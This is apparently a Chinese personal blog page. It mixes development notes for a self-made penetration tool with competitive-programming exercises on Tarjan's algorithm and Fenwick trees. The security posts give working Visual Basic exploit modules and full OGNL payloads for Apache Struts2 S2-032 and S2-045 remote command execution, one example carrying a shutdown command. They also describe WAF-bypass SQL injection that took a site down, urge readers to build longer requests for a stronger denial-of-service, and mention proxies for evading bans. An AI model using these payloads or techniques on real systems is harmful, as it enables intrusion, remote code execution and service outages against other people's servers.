MAX红隼渗透平台开发进度

20170608194831

SQL注入攻击:过狗语句依然没有构造出合适的,但是前几天已经尝试到一个有很大几率成功的语句,但是只限于MYsql的库,而且在字符注入上也存在一定问题,广告位有dalao想搞事情嘛23333、

漏洞利用攻击:现在已经加入两个ST2的exp模块,以后可能会继续跟一部分IIS的

CC随机穿盾攻击:正在改为更为精准设计的ATP式用户控制的模式,将改为专门单独窗体

2017.6.8目前修改进度

ST2-032 CVE级漏洞分析

MAX红隼渗透平台 漏洞利用攻击已经集成此漏洞攻击模块

放送攻击模块

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
Public Function S2_032EX(A_Murl As String, A_Cmd As String)
Dim A_Head As String
Dim A_data As String
Dim fuS As String
On Error Resume Next
 WebBrowser1.Navigate2 A_Murl
 fuS = WebBrowser1.Document.documentelement.innerText
A_Head = "User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
Payload_A = "method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding[0]),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd[0]).getInputStream()).useDelimiter(%23parameters.pp[0]),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp[0],%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&cmd="
Payload_B = "&pp=A&ppp=%20&encoding=UTF-8"
A_data = Payload_A + A_Cmd + Payload_B
Dim ONP As Integer, ONG As Integer
ONP = 0
ONG = 0
If InStr(Text7.Text, "POST") > 0 Then ONP = 1
If InStr(Text7.Text, "GET") > 0 Then ONG = 1
'MsgBox ONP
A_data = "?" + A_data
WebBrowser1.Navigate2 A_Murl & A_data
fuS = WebBrowser1.Document.documentelement.innerText
Dim strs1 As Integer
strs1 = Len(fuS)
'MsgBox strs1
If strs1 = 295 Or strs1 = 617 Or strs1 = 25 Or strs1 = 4 Then
 If ONP = 1 Then
  Payload_A = "method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding[0]),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd[0]).getInputStream()).useDelimiter(%23parameters.pp[0]),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp[0],%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&cmd="
  Payload_B = "&pp=A&ppp=%20&encoding=UTF-8"
  A_data = Payload_A + A_Cmd + Payload_B
  inet_A.Execute A_Murl, "POST", A_data, A_Head
  Sleep 200
  MsgBox "DATA:" + A_data
   WebBrowser1.Navigate2 A_Murl & "?" & A_data
   Sleep 400
   fuS = WebBrowser1.Document.documentelement.innerText
   strs1 = Len(fuS)
   If strs1 <> 295 And strs1 <> 617 Then MsgBox "return:" + vbCrLf + fuS
 End If
'ONOFF
 If ONG = 1 Then
  A_Murl = A_Murl + "?" + Payload_A + A_Cmd + Payload_B
  inet_A.Execute A_Murl, "GET", , A_Head
  Sleep 200
  MsgBox "URL:" + A_Murl
   WebBrowser1.Navigate2 A_Murl & A_data
   Sleep 400
   fuS = WebBrowser1.Document.documentelement.innerText
   strs1 = Len(fuS)
   If strs1 <> 295 And strs1 <> 617 Then MsgBox "return:" + vbCrLf + fuS
 End If
End If
If strs1 <> 295 And strs1 <> 617 Then MsgBox "return:" + vbCrLf + fuS
 
End Function

去年一个洞了,记得那个时候刷rank的还很多23333(进去不少呢),但类似于最近的IIS 6溢出洞,有点鸡肋,那个需要webdav,这个需要开启动态方法调试,GG

此攻击是传入Action的method属性,喜闻乐见的method:,然后继续传到ActionProxy的method,最终会传到ognlUtil.getValue这个函数,喜闻乐见,ONNL指令就这样被执行了,至于传输限制,我们可以将获取的结果覆盖_memberAccess属性,这样就可以绕过SecurityMemberAccess的限制。

但是实际上利用Webbrowser API直接请求可能会崩,所以我加了个一个判断,失败就用Inet API进行http请求,但是这样可能会导致同一cmd语句执行两次,就这样吧。。。

shellcode如下:

?method:%23_memberAccess%3d@ognl.OgnlContext@DEF

AULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletAc

tionContext%40getResponse(),%23res.setCharacterEn

coding(%23parameters.encoding[0]),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scann

er(@java.lang.Runtime@getRuntime().exec(%23paramet

ers.cmd[0]).getInputStream()).useDelimiter(%23parameters.pp[0]),%23str%3d%23s.hasNext()

%3f%23s.next()%3a%23parameters.ppp[0],%23w.print(

%23str),%23w.close(),1?%23xx:%23request.toString&cmd=shutdown -s -t 1&pp=A&ppp=%20&encoding=UTF-8″更改cmd=来远程执行命令

 

ST2-045 CVE级漏洞分析

MAX红隼渗透平台 漏洞利用攻击已经集成此漏洞攻击模块

放送一下代码~~

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
Public Function S2_045EX(A_Murl As String, A_Cmd As String)
Dim A_Head As String
Dim A_data As String
On Error Resume Next
Dim ONP As Integer, ONG As Integer
ONP = 0
ONG = 0
If InStr(Text7.Text, "POST") > 0 Then ONP = 1
If InStr(Text7.Text, "GET") > 0 Then ONG = 1
 
A_data = "image1 = %A0%20%30%21%20%20%20%A6%20%20%A8%20%B2%20%20%40%3C%20%3C%20%20%D4%20%20%20%20%20%3C%20%21%20%20%20%21%20%20%20%20%20%3C%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
A_Head = "Content-Type: "
 
Payload_A = "%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)(#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='"
 
Payload_B = "').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"
A_Head = A_Head + Payload_A + A_Cmd + Payload_B & vbCrLf & "User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" & vbCrLf
If ONP = 1 Then
 inet_A.Execute A_Murl, "POST", A_data, A_Head
 MsgBox "method is Post" & vbCrLf & "SHELLCODE IS:" & vbCrLf & A_Head
End If
 
If ONG = 1 Then
 inet_A.Execute A_Murl, "GET", , A_Head
 MsgBox "method is Get" & vbCrLf & "SHELLCODE IS:" & vbCrLf & A_Head
End If
 
'MsgBox "because of the socket sending,pls wait the first time"
'Sleep 2200
'MsgBox "because of the socket sending,pls wait the second time"
'Sleep 500
'inet_A.Execute A_Murl, "POST", "", A_Head
 
'MsgBox A_Head
End Function

相信前几天传的这个st2-045大家也早就知道了,但是很少有用vb和vc写出模块来的,主要都是py写的,没有vc写的命令行下的exp真不舒服。。。

通过分析可以发现这个洞是由于Jakarta plugin这个插件导致的,但是并不如此,这个方法甚至跟这个插件没有多大关系。

问题出在

if (LocalizedTextUtil.findText(this.getClass(), errorKey, defaultLocale, null, new Object[0]) == null) {
return LocalizedTextUtil.findText(this.getClass(), “struts.messages.error.uploading”, defaultLocale, null, new Object[] { e.getMessage() });
} else {
return LocalizedTextUtil.findText(this.getClass(), errorKey, defaultLocale, null, args);
}

所以可以很简单的发现是对type头检查导致的错误,所以只需用针对利用改掉type即可发动攻击

shellcode-TYPE如下“%{(#nike=’multipart/form-data’).(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)(#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd=’ifconfig’).(#iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(#cmds=(#iswin?{‘cmd.exe’,’/c’,#cmd}:{‘/bin/bash’,’-c’,#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}”

修改(#cmd=’ifconfig’)=后即可执行任意命令

 

对付安全狗配WIN-IIS?构造DDOS语句

好得今天晚上把MAX渗透礼花弹基础功能写完了,写注入的时候一直在尝试构造过狗语句= =,后面会加上如标题所示的新ddos功能。

PS:UI明天做XD
QQ截图20170127235028
今天晚上在想如何搞过狗注入的时候,自己尝试构造了很多语句,内联注释啊,多注释啊,%%%法啊,大小写法啊,动态计算法啊啥啥啥的都试了,也就差尝试宽字符注入构造了= =

结果又想起来,这破狗会不会对%20或者*敏感,当然试了很多次还是效果很差。。。后来就想是否有字数限制呢,这就是这个攻击的关键了。。。(我本来以为可以过狗lol)

结果随便写了一个调交了一次不行,稍微改长了一点还是不行,突破500还是不可过狗注入。。。但是交着交着。。。站死了(不是IP封禁,我换了代理又用了流量。。。嗯,又让别人看了,确实d死了)

查了下资料,web解释不了%时就会进入asp.DLL继续解释,又加上对于各个参数污染的过滤,过长的注入语句指数级消耗服务器资源最终就构成了这次意外的ddos攻击(最终结果是这站管理把我IP给禁了,不过我毕竟一批代理用吗,实在不行用自己服务器的ss)

我当时构造的语句长度比较长,消耗服务器性能确实高但是很多webbrowser的api都用不了,所以大家最好重新构造,不然不容易集合利用

大家可以继续加长长度,效果会更佳23333,也可以加入更多耗费服务器资源的思路技巧,所谓道高一尺魔高一丈,繁多的检查虽然有效的保证了暂时的防注入防xss安全,但是却没有考虑到对应的xss,就像MS15-034一样,形成了强效的ddos攻击。

 

Tarjan练习 CODEVS1332 上白泽慧音

这个题。。。须臾dalao看到会高兴的2333

虽然图论学了很久。。但tarjan还是懒得学。。。

于是今天放假在机房做了这个例题。。。特地加了很多注释(翻以前写的渗透工具代码都看不懂了。。吓得我赶紧打了注释)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
#include <stdio.h>
#include <iostream>//甚至没有oi库、、、 
#include <algorithm>//没用到算法库啊。。。 
#include <stack>
using namespace std;
int x,mins=0;
int oldbest=99999999999;
int m,n,tot,head[5005];
int dfn[5005],low[5005],sccno[5005],num,cnt,sum[5005],ans,mark;
stack<int>EDP;
//DFN[ i ] : 在DFS中该节点被搜索的次序(时间戳)
//LOW[ i ] : 为i或i的子树能够追溯到的最早的栈中节点的次序号
//当DFN[ i ]==LOW[ i ]时,为i或i的子树可以构成一个强连通分量。
struct node { //邻接表储存,你高兴就好,毕竟减小空间。。。 
	int to; //相邻点指向 
	int next;  //论此点一个有多少个相邻点
} Graph[100005];
 
void add(int x,int y) {//加边函数 
	tot++; //+1s准备为下一位做准备 
	Graph[tot].to=y;  //记录连接点 
	Graph[tot].next=head[x];   //遍历时往前跑用的(讲道理,改进下就不需要了,可以省空间) 
	head[x]=tot;//记录连接点数 
}
void tarjan(int u) {
	int i,j;
	dfn[u]=low[u]=++num;//无回溯时dfn==low要按dfs序赋值 
	EDP.push(u);//压到栈中,为后来回溯做检查准备 
	for (i=head[u]; i; i=Graph[i].next) {//枚举每条边。PS i和graph不同步,i只是计数,graph向前找相应位数 
		int v=Graph[i].to;//确立连接点 
		if (!dfn[v]) {//没访问过,不然序号不可能为零,所以我们不需要设立vis数组来“占用额外空间 ” 
			tarjan(v);//继续向下找,遍历 
			low[u]=min(low[u],low[v]);
			//3.如果此时(时间为dfn[u]时)v不在栈中,u的low值为两点的low值中较小的一个。
		} else if (!sccno[v]) //还未曾属于那个强联通集合 
			low[u]=min(low[u],dfn[v]);
		//4.如果此时(时间为dfn[u]时)v在栈中,u的low值为u的low值和v的dfn值中较小的一个。
	}
	if (low[u]==dfn[u]) {//5
		cnt++;//++分量数序号
		while (true) {
			x=EDP.top();//取出并弹出 
			EDP.pop();
			sccno[x]=cnt;//标记顶点x属于第cnt个强连通分量
			sum[cnt]++;//该序号的分量点数
			if (x==u) break;
		}
		// --------此题的选择---> tarjan算法之外的内容      //
		if (sum[cnt]>=ans) {//记录强连通分量的最值
			if(sum[cnt]==ans) { //如果位数相等那么直接找两者最小值对比 
				for (i=1; i<=n; i++) {
					if (sccno[i]==cnt) {//找到该最小值 
						mins=i;
						break;//找到最小就跳 
					}
				}
				if(mins<oldbest) {//如果比他小那么就mark并重记录最小值 
					ans=sum[cnt];//最多数量 
					mark=cnt;//最大分量数 的序号
					oldbest=mins;//记录最前值 
				}
			} 
			else{ //如果大于那么就不mark直接记录最小值 
				for (i=1; i<=n; i++) {
					if (sccno[i]==cnt) {//找到该最小值 
						mins=i;
						break;//找到最小就跳 
					}
				}
				ans=sum[cnt];
				mark=cnt;//最大分量数 的序号
				oldbest=mins;//记录最小值 
			}
		}
		//  -------  <---选择 此题的选择,tarjan之外的内容 //
	}
 
}
int main() {//main我就没什么需要说的了。。。 
	int i,j,x,y,t;//t就是确立是单向边,还是双向边的一个参数。。。 
	scanf("%d%d",&n,&m);
	for (i=1; i<=m; i++) {
		scanf("%d%d%d",&x,&y,&t);
		add(x,y);
		if (t==2)
			add(y,x);
	}
	for (i=1; i<=n; i++)
		if (!dfn[i]) tarjan(i);
	printf("%d\n",ans);
	for (i=1; i<=n; i++)  //找到mark标记,输出对应强联通节点 
		if (sccno[i]==mark) printf("%d ",i);
	return 0;
}

 

NOIP初赛退役选手

mdzz。。。我还以为初赛属于随便过的那种。。。

结果今年跟考数学一样,平常一直用sort。。。结果竟然要手写快排。。。还有求树的重心(这尼玛什么鬼啊),选择题都还好说。。。md程序阅读题错了三,程序填空当根据上下文猜测题意来做的。。。md没救了。。。

不说了,没事我初赛退役了

树状数组练习 CODEVS1217 借教室

题目描述 Description

在大学期间,经常需要租借教室。大到院系举办活动,小到学习小组自习讨论,都需要

向学校申请借教室。教室的大小功能不同,借教室人的身份不同,借教室的手续也不一样。

面对海量租借教室的信息,我们自然希望编程解决这个问题。

我们需要处理接下来n天的借教室信息,其中第i天学校有ri个教室可供租借。共有m份

订单,每份订单用三个正整数描述,分别为dj, sj, tj,表示某租借者需要从第sj天到第tj天租

借教室(包括第sj天和第tj天),每天需要租借dj个教室。

我们假定,租借者对教室的大小、地点没有要求。即对于每份订单,我们只需要每天提

供dj个教室,而它们具体是哪些教室,每天是否是相同的教室则不用考虑。

借教室的原则是先到先得,也就是说我们要按照订单的先后顺序依次为每份订单分配教

室。如果在分配的过程中遇到一份订单无法完全满足,则需要停止教室的分配,通知当前申

请人修改订单。这里的无法满足指从第sj天到第tj天中有至少一天剩余的教室数量不足dj个。

现在我们需要知道,是否会有订单无法完全满足。如果有,需要通知哪一个申请人修改

订单。

输入描述 Input Description

第一行包含两个正整数n, m,表示天数和订单的数量。

提高组  day2 

 

第二行包含n个正整数,其中第i个数为ri,表示第i天可用于租借的教室数量。

接下来有m行,每行包含三个正整数dj, sj, tj,表示租借的数量,租借开始、结束分别在

第几天。

每行相邻的两个数之间均用一个空格隔开。天数与订单均用从1开始的整数编号。

输出描述 Output Description

如果所有订单均可满足,则输出只有一行,包含一个整数 0。否则(订单无法完全满足)

输出两行,第一行输出一个负整数-1,第二行输出需要修改订单的申请人编号。

最后俺那个算法只能过一个点,然后俺老师帮俺改了下,但是还是只能过几个点

#include<cstdio>
#include<cstring>
#include<iostream>
using namespace std;
#define lowbit(x) x&(-x)
#define ll long long
#define MAXN 2000100
using namespace std;
ll a[MAXN],c[MAXN];
ll n,m;
ll days,pays,classopen1[1000001];

inline ll read() {
ll x=0,f=1;
char ch=getchar();
while(ch>’9’||ch<‘0’) {
if(ch==’-‘)f=-1;
ch=getchar();
}
while(ch>=’0’&&ch<=’9′) {
x=x*10+ch-‘0’;
ch=getchar();
}
return x*f;
}
struct tree_array_single {
ll arr[MAXN];
void add( ll x, ll n) {
while(x<=days)arr[x]+=n,x+=lowbit(x);
}
ll sum( ll x) {
ll sum=0;
while(x)sum+=arr[x],x-=lowbit(x);
return sum;
}
} T1,T2;
//inline void reset(){CLR(T1.arr,0); CLR(T2.arr,0);}
inline void add( ll x, ll n) {
T1.add(x,n);
//T2.add(x,x*n);
}
inline void update( ll L, ll R, ll n) {
add(L,n);
add(R+1,-n);
}
ll qs(ll x){
return T1.sum(x);
}
inline ll sum( ll x) {
return (x+1)*T1.sum(x)-T2.sum(x);
}
inline ll query( ll L, ll R) {
return sum(R)-sum(L-1);
}
ll amount,st,en;
int main()
{

days=read();
pays=read();
// ll min=1000000000;
for(ll i=1;i<=days;i++){
classopen1[i]=read();
//add(i,classopen1[i]-classopen1[i-1]);
}
for( ll i=1;i<=pays;i++)
{
// min=1000000000;
amount=read();
st=read();
en=read();
//cout<<“q,i”<<query(i,i)<<endl;

//prllf(“AMOUNT—%d—\n”,payday[i].amount);
update(st,en,amount);
//cout<<“i “<<T1.sum(i)<<endl;
for( ll j=st;j<=en;j++)
{ ll tm=qs(j);
// cout<<“q j “<<amount<<” “<<j<<” “<<tm<<endl;
if (tm>classopen1[j]) {
//ll thiss=i;
printf(“-1\n%lld”,i);
return 0;
}
}
}
printf(“0”);
return 0;
}

树状数组练习 CODEVS1082 线段树练习3

题目描述 Description

给你N个数,有两种操作:
1:给区间[a,b]的所有数增加X
2:询问区间[a,b]的数的和。

输入描述 Input Description

第一行一个正整数n,接下来n行n个整数,

再接下来一个正整数Q,每行表示操作的个数,

如果第一个数是1,后接3个正整数,

表示在区间[a,b]内每个数增加X,如果是2,

表示操作2询问区间[a,b]的和是多少。

pascal选手请不要使用readln读入

输出描述 Output Description

对于每个询问输出一行一个答案

样例输入 Sample Input

3

1

2

3

2

1 2 3 2

2 2 3

样例输出 Sample Output

9

 

怕记不住算法具体内容。。。去找了一份写得好的来记上。。

#include <bits/stdc++.h>
#include <malloc.h>
#include <memory.h>
#define lowbit(x) x&(-x)
#define ll long long
#define MAXN 200010
using namespace std;
ll a[MAXN],c[MAXN];
ll n,m;

//读入优化》
inline ll read() {
int x=0,f=1;
char ch=getchar();
while(ch>’9’||ch<‘0’) {
if(ch==’-‘)f=-1;
ch=getchar();
}
while(ch>=’0’&&ch<=’9′) {
x=x*10+ch-‘0’;
ch=getchar();
}
return x*f;
}

//读入优化《
struct tree_array_single {
ll arr[MAXN];
void add(ll x,ll n) {
while(x<=MAXN)arr[x]+=n,x+=lowbit(x);
}
ll sum(ll x) {
ll sum=0;
while(x)sum+=arr[x],x-=lowbit(x);
return sum;
}
} T1,T2;
//inline void reset(){CLR(T1.arr,0); CLR(T2.arr,0);}
inline void add(ll x,ll n) {
T1.add(x,n);
T2.add(x,x*n);
}
inline void update(int L,int R,ll n) {
add(L,n);
add(R+1,-n);
}
inline ll sum(ll x) {
return (x+1)*T1.sum(x)-T2.sum(x);
}
inline ll query(int L,int R) {
return sum(R)-sum(L-1);
}
//int c1[MAXN],c2[MAXN];
int main() {
n=read();
for(ll i=1; i<=n; i++) {
a[i]=read();
add(i,a[i]-a[i-1]);
}
m=read();
for(ll i=1; i<=m; i++) {
ll h;
h=read();
if(h==1) {
ll b,c,d;
b=read();
c=read();
d=read();
update(b,c,d);
} else {
ll b,c;
b=read();
c=read();
printf(“%lld\n”,query(b,c));
}
}
}